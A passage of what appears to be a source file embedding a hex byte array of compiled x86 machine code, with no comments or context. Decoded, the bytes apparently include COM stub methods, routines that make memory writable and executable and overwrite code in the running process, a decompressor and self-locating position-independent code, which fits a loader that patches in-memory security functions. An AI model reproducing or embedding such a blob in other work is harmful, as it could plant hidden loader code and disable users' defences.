1604 0x80, 0xeb, 0x0e, 0x8b, 0x45, 0x0c, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00,
1605 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5,
1606 0x83, 0xec, 0x18, 0x83, 0x7d, 0x14, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40,
1607 0x00, 0x80, 0xeb, 0x29, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8b, 0x00,
1608 0x8b, 0x40, 0x04, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x08, 0x89, 0x14, 0x24,
1609 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x08, 0x8b,
1610 0x45, 0x14, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc9, 0xc2, 0x10,
1611 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x08, 0x8b, 0x40,
1612 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x28, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x08,
1613 0x8b, 0x4d, 0x1c, 0x89, 0x4c, 0x24, 0x0c, 0x8b, 0x4d, 0x14, 0x89, 0x4c,
1614 0x24, 0x08, 0x8b, 0x4d, 0x10, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24,
1615 0xff, 0xd0, 0x83, 0xec, 0x10, 0xc9, 0xc2, 0x18, 0x00, 0x55, 0x89, 0xe5,
1616 0x53, 0x83, 0xec, 0x44, 0x8b, 0x45, 0x18, 0x66, 0x89, 0x45, 0xe4, 0x8b,
1617 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x2c, 0x0f, 0xb7,
1618 0x4d, 0xe4, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x08, 0x8b, 0x5d, 0x28, 0x89,
1619 0x5c, 0x24, 0x1c, 0x8b, 0x5d, 0x24, 0x89, 0x5c, 0x24, 0x18, 0x8b, 0x5d,
1620 0x20, 0x89, 0x5c, 0x24, 0x14, 0x8b, 0x5d, 0x1c, 0x89, 0x5c, 0x24, 0x10,
1621 0x89, 0x4c, 0x24, 0x0c, 0x8b, 0x4d, 0x0c, 0x89, 0x4c, 0x24, 0x08, 0x8b,
1622 0x4d, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1623 0xec, 0x20, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x5d, 0xfc, 0xc9,
1624 0xc2, 0x24, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1625 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1626 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1627 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1628 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1629 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x04, 0x8b, 0x45, 0x0c,
1630 0x66, 0x89, 0x45, 0xfc, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc9, 0xc2, 0x08,
1631 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x08, 0x8b, 0x40,
1632 0x0c, 0x8b, 0x00, 0x8b, 0x40, 0x38, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x0c,
1633 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
1634 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0xfd, 0xff, 0xff, 0xff,
1635 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0xb8, 0x00, 0x00, 0x00,
1636 0x00, 0xc9, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1637 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1638 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1639 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1640 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1641 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1642 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1643 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1644 0x80, 0x5d, 0xc2, 0x10, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1645 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1646 0x80, 0x5d, 0xc2, 0x14, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1647 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b,
1648 0x45, 0x08, 0x8b, 0x40, 0x14, 0x8b, 0x40, 0x44, 0x8b, 0x55, 0x0c, 0x89,
1649 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0x00, 0x00, 0x00, 0x00,
1650 0xc9, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1651 0x5d, 0xc2, 0x0c, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1652 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1653 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1654 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x8b, 0x45, 0x1c, 0xc7, 0x00,
1655 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc2, 0x18,
1656 0x00, 0x55, 0x89, 0xe5, 0x8b, 0x45, 0x08, 0x0f, 0xaf, 0x45, 0x0c, 0x5d,
1657 0xc3, 0x55, 0x89, 0xe5, 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x00, 0x00, 0x00,
1658 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc2, 0x14, 0x00, 0x55, 0x89,
1659 0xe5, 0x8b, 0x55, 0x08, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x5d, 0xc3, 0x55,
1660 0x89, 0xe5, 0x83, 0xec, 0x58, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01,
1661 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x8b,
1662 0x45, 0x08, 0x05, 0x28, 0x03, 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0x8b,
1663 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xa2, 0xbf, 0xff, 0xff, 0x89, 0x45,
1664 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00,
1665 0xe9, 0x02, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x05, 0x9c, 0x05, 0x00,
1666 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
1667 0x08, 0x8b, 0x45, 0xf0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89,
1668 0x04, 0x24, 0xe8, 0x10, 0xbd, 0xff, 0xff, 0x89, 0x45, 0xec, 0x83, 0x7d,
1669 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9, 0x01,
1670 0x00, 0x00, 0xb8, 0x89, 0x5d, 0x40, 0x00, 0xba, 0x74, 0x5d, 0x40, 0x00,
1671 0x29, 0xd0, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8, 0x85, 0xc0, 0x79, 0x0a,
1672 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x01, 0x00, 0x00, 0x8b, 0x45,
1673 0xec, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0xe8, 0x89, 0x45, 0xd8, 0x8b, 0x45,
1674 0xf4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x45, 0xe0, 0x89, 0x44, 0x24, 0x10,
1675 0xc7, 0x44, 0x24, 0x0c, 0x40, 0x00, 0x00, 0x00, 0x8d, 0x45, 0xd8, 0x89,
1676 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04,
1677 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd4, 0x0b, 0x00, 0x00, 0x89, 0x45,
1678 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x79, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00,
1679 0xe9, 0x5a, 0x01, 0x00, 0x00, 0xe8, 0x6e, 0x02, 0x00, 0x00, 0xba, 0x74,
1680 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1681 0x8b, 0x45, 0xe8, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b,
1682 0x45, 0xec, 0x89, 0x04, 0x24, 0xe8, 0x90, 0x05, 0x00, 0x00, 0x8b, 0x45,
1683 0xe0, 0x8b, 0x55, 0xf4, 0x89, 0x54, 0x24, 0x14, 0x8d, 0x55, 0xdc, 0x89,
1684 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x45, 0xd8, 0x89, 0x44,
1685 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24,
1686 0xff, 0xff, 0xff, 0xff, 0xe8, 0x69, 0x0b, 0x00, 0x00, 0x8b, 0x45, 0x08,
1687 0x05, 0xac, 0x05, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00,
1688 0x00, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x45, 0xf0, 0x89, 0x44, 0x24, 0x04,
1689 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x10, 0xbc, 0xff, 0xff, 0x89,
1690 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
1691 0x00, 0xe9, 0xc9, 0x00, 0x00, 0x00, 0xb8, 0xaa, 0x5d, 0x40, 0x00, 0xba,
1692 0x95, 0x5d, 0x40, 0x00, 0x29, 0xd0, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8,
1693 0x85, 0xc0, 0x79, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x00,
1694 0x00, 0x00, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0xe8, 0x89,
1695 0x45, 0xd8, 0x8b, 0x45, 0xf4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x45, 0xe0,
1696 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0x40, 0x00, 0x00, 0x00,
1697 0x8d, 0x45, 0xd8, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44,
1698 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd4, 0x0a,
1699 0x00, 0x00, 0x89, 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x79, 0x07, 0xb8,
1700 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5d, 0xe8, 0x71, 0x01, 0x00, 0x00, 0xba,
1701 0x95, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1702 0xc2, 0x8b, 0x45, 0xe8, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04,
1703 0x8b, 0x45, 0xec, 0x89, 0x04, 0x24, 0xe8, 0x93, 0x04, 0x00, 0x00, 0x8b,
1704 0x45, 0xe0, 0x8b, 0x55, 0xf4, 0x89, 0x54, 0x24, 0x14, 0x8d, 0x55, 0xdc,
1705 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x45, 0xd8, 0x89,
1706 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04,
1707 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x6c, 0x0a, 0x00, 0x00, 0xb8, 0x01,
1708 0x00, 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x00, 0x00,
1709 0x00, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x48, 0x8b, 0x45, 0x08,
1710 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
1711 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x08, 0x05, 0x3c, 0x03, 0x00, 0x00, 0x89,
1712 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x52, 0xbd,
1713 0xff, 0xff, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0x08, 0x05, 0xbc, 0x05, 0x00,
1714 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
1715 0x08, 0x8b, 0x45, 0xf0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89,
1716 0x04, 0x24, 0xe8, 0xd0, 0xba, 0xff, 0xff, 0x89, 0x45, 0xec, 0x83, 0x7d,
1717 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa0, 0x00,
1718 0x00, 0x00, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xdc, 0x04,
1719 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x45,
1720 0xe4, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0x40, 0x00, 0x00,
1721 0x00, 0x8d, 0x45, 0xdc, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd8, 0x89,
1722 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xb3,
1723 0x09, 0x00, 0x00, 0x89, 0x45, 0xe8, 0x83, 0x7d, 0xe8, 0x00, 0x79, 0x07,
1724 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x53, 0x8b, 0x45, 0x08, 0x05, 0xe1,
1725 0x05, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x04, 0x00, 0x00, 0x00, 0x89,
1726 0x44, 0x24, 0x04, 0x8b, 0x45, 0xec, 0x89, 0x04, 0x24, 0xe8, 0x7c, 0x03,
1727 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x55, 0xf4, 0x89, 0x54, 0x24, 0x14,
1728 0x8d, 0x55, 0xe0, 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x0c, 0x8d,
1729 0x45, 0xdc, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd8, 0x89, 0x44, 0x24,
1730 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x55, 0x09, 0x00,
1731 0x00, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xc9, 0xc3, 0xe8, 0x00, 0x00, 0x00,
1732 0x00, 0x58, 0x83, 0xe8, 0x05, 0xc3, 0x90, 0x90, 0x55, 0x89, 0xe5, 0x83,
1733 0xec, 0x10, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x0c, 0x8d, 0x48, 0xff, 0x8b,
1734 0x55, 0x08, 0x89, 0x4a, 0x0c, 0x85, 0xc0, 0x75, 0x23, 0x8b, 0x45, 0x08,
1735 0x8b, 0x00, 0x8d, 0x48, 0x01, 0x8b, 0x55, 0x08, 0x89, 0x0a, 0x0f, 0xb6,
1736 0x00, 0x0f, 0xb6, 0xd0, 0x8b, 0x45, 0x08, 0x89, 0x50, 0x08, 0x8b, 0x45,
1737 0x08, 0xc7, 0x40, 0x0c, 0x07, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
1738 0x40, 0x08, 0xc1, 0xe8, 0x07, 0x83, 0xe0, 0x01, 0x89, 0x45, 0xfc, 0x8b,
1739 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8d, 0x14, 0x00, 0x8b, 0x45, 0x08, 0x89,
1740 0x50, 0x08, 0x8b, 0x45, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83,
1741 0xec, 0x14, 0xc7, 0x45, 0xf8, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf8,
1742 0x8d, 0x1c, 0x00, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x82, 0xff,
1743 0xff, 0xff, 0x01, 0xd8, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0x08, 0x89, 0x04,
1744 0x24, 0xe8, 0x72, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x75, 0xdb, 0x8b, 0x45,
1745 0xf8, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83, 0xec,
1746 0x34, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0x0c, 0x89, 0x45,
1747 0xd8, 0xc7, 0x45, 0xe0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0xff,
1748 0xff, 0xff, 0xff, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45,
1749 0xe8, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xd4, 0x8d, 0x42, 0x01, 0x89,
1750 0x45, 0xd4, 0x8b, 0x45, 0xd8, 0x8d, 0x48, 0x01, 0x89, 0x4d, 0xd8, 0x0f,
1751 0xb6, 0x12, 0x88, 0x10, 0xe9, 0x0f, 0x02, 0x00, 0x00, 0x8d, 0x45, 0xd4,
1752 0x89, 0x04, 0x24, 0xe8, 0x10, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
1753 0xde, 0x01, 0x00, 0x00, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0xfd,
1754 0xfe, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xe3, 0x00, 0x00, 0x00, 0x8d,
1755 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0xea, 0xfe, 0xff, 0xff, 0x85, 0xc0,
1756 0x74, 0x6b, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xe4,
1757 0x04, 0x00, 0x00, 0x00, 0xeb, 0x1a, 0x8b, 0x45, 0xf8, 0x8d, 0x1c, 0x00,
1758 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0xc5, 0xfe, 0xff, 0xff, 0x01,
1759 0xd8, 0x89, 0x45, 0xf8, 0x83, 0x6d, 0xe4, 0x01, 0x83, 0x7d, 0xe4, 0x00,
1760 0x75, 0xe0, 0x83, 0x7d, 0xf8, 0x00, 0x74, 0x1d, 0x8b, 0x55, 0xd8, 0x8b,
1761 0x45, 0xf8, 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12,
1762 0x88, 0x10, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xd8, 0xeb,
1763 0x0c, 0x8b, 0x45, 0xd8, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xd8, 0xc6, 0x00,
1764 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x6f, 0x01, 0x00,
1765 0x00, 0x8b, 0x45, 0xd4, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xd4, 0x0f, 0xb6,
1766 0x00, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xf8, 0x83, 0xe0,
1767 0x01, 0x83, 0xc0, 0x02, 0x89, 0x45, 0xf4, 0xd1, 0x6d, 0xf8, 0x83, 0x7d,
1768 0xf8, 0x00, 0x74, 0x29, 0xeb, 0x1f, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf8,
1769 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10,
1770 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xd8, 0x83, 0x6d, 0xf4,
1771 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0xdb, 0xeb, 0x07, 0xc7, 0x45, 0xe8,
1772 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf8, 0x89, 0x45, 0xf0, 0xc7, 0x45,
1773 0xec, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x06, 0x01, 0x00, 0x00, 0x8d, 0x45,
1774 0xd4, 0x89, 0x04, 0x24, 0xe8, 0x66, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xf8,
1775 0x83, 0x7d, 0xec, 0x00, 0x75, 0x46, 0x83, 0x7d, 0xf8, 0x02, 0x75, 0x40,
1776 0x8b, 0x45, 0xf0, 0x89, 0x45, 0xf8, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24,
1777 0xe8, 0x46, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xf4, 0xeb, 0x1f, 0x8b, 0x55,
1778 0xd8, 0x8b, 0x45, 0xf8, 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f,
1779 0xb6, 0x12, 0x88, 0x10, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45,
1780 0xd8, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0xdb, 0xe9,
1781 0x85, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x06, 0x83, 0x6d,
1782 0xf8, 0x03, 0xeb, 0x04, 0x83, 0x6d, 0xf8, 0x02, 0xc1, 0x65, 0xf8, 0x08,
1783 0x8b, 0x45, 0xd4, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xd4, 0x0f, 0xb6, 0x00,
1784 0x0f, 0xb6, 0xc0, 0x01, 0x45, 0xf8, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24,
1785 0xe8, 0xe6, 0xfd, 0xff, 0xff, 0x89, 0x45, 0xf4, 0x81, 0x7d, 0xf8, 0xff,
1786 0x7c, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf4, 0x01, 0x81, 0x7d, 0xf8,
1787 0xff, 0x04, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d,
1788 0xf8, 0x7f, 0x77, 0x25, 0x83, 0x45, 0xf4, 0x02, 0xeb, 0x1f, 0x8b, 0x55,
1789 0xd8, 0x8b, 0x45, 0xf8, 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f,
1790 0xb6, 0x12, 0x88, 0x10, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45,
1791 0xd8, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0xdb, 0x8b,
1792 0x45, 0xf8, 0x89, 0x45, 0xf0, 0xc7, 0x45, 0xec, 0x01, 0x00, 0x00, 0x00,
1793 0xeb, 0x1e, 0x8b, 0x55, 0xd4, 0x8d, 0x42, 0x01, 0x89, 0x45, 0xd4, 0x8b,
1794 0x45, 0xd8, 0x8d, 0x48, 0x01, 0x89, 0x4d, 0xd8, 0x0f, 0xb6, 0x12, 0x88,
1795 0x10, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xe8, 0x00,
1796 0x0f, 0x84, 0xe7, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0xd8, 0x2b, 0x45, 0x0c,
1797 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x90, 0x90, 0x90, 0x55, 0x89, 0xe5, 0x83,
1798 0xec, 0x10, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xfc, 0xeb, 0x0e, 0x8b, 0x45,
1799 0x0c, 0x89, 0xc2, 0x8b, 0x45, 0xfc, 0x88, 0x10, 0x83, 0x45, 0xfc, 0x01,
1800 0x8b, 0x45, 0x10, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x10, 0x85, 0xc0, 0x75,
1801 0xe5, 0x8b, 0x45, 0x08, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10,
1802 0x8b, 0x45, 0x08, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xf8,
1803 0xeb, 0x13, 0x8b, 0x45, 0xf8, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xfc, 0x88,
1804 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x45, 0xf8, 0x01, 0x8b, 0x45, 0x10,
1805 0x8d, 0x50, 0xff, 0x89, 0x55, 0x10, 0x85, 0xc0, 0x75, 0xe0, 0x8b, 0x45,
1806 0x08, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x56, 0x53, 0x8b, 0x5d, 0x08, 0x8b,
1807 0x75, 0x0c, 0xeb, 0x32, 0x89, 0xd8, 0x8d, 0x58, 0x01, 0x0f, 0xb6, 0x10,
1808 0x89, 0xf0, 0x8d, 0x70, 0x01, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x74, 0x1e,
1809 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10, 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00,
1810 0x38, 0xc2, 0x73, 0x07, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xeb, 0x19, 0xb8,
1811 0x01, 0x00, 0x00, 0x00, 0xeb, 0x12, 0x8b, 0x45, 0x10, 0x8d, 0x50, 0xff,
1812 0x89, 0x55, 0x10, 0x85, 0xc0, 0x75, 0xc1, 0xb8, 0x00, 0x00, 0x00, 0x00,
1813 0x5b, 0x5e, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0xeb, 0x1f, 0x8b, 0x45, 0x08,
1814 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x74,
1815 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2a, 0x83, 0x45, 0x08, 0x01,
1816 0x83, 0x45, 0x0c, 0x01, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1817 0x74, 0x0a, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xcd,
1818 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0, 0x0f,
1819 0xb6, 0xc0, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x08, 0xeb, 0x2f,
1820 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00,
1821 0x38, 0xc2, 0x75, 0x1b, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x8b,
1822 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x8e, 0xff, 0xff, 0xff, 0x85, 0xc0,
1823 0x74, 0x05, 0x8b, 0x45, 0x08, 0xeb, 0x13, 0x83, 0x45, 0x08, 0x01, 0x8b,
1824 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc7, 0xb8, 0x00, 0x00,
1825 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0xeb, 0x18, 0x8b, 0x45, 0x08,
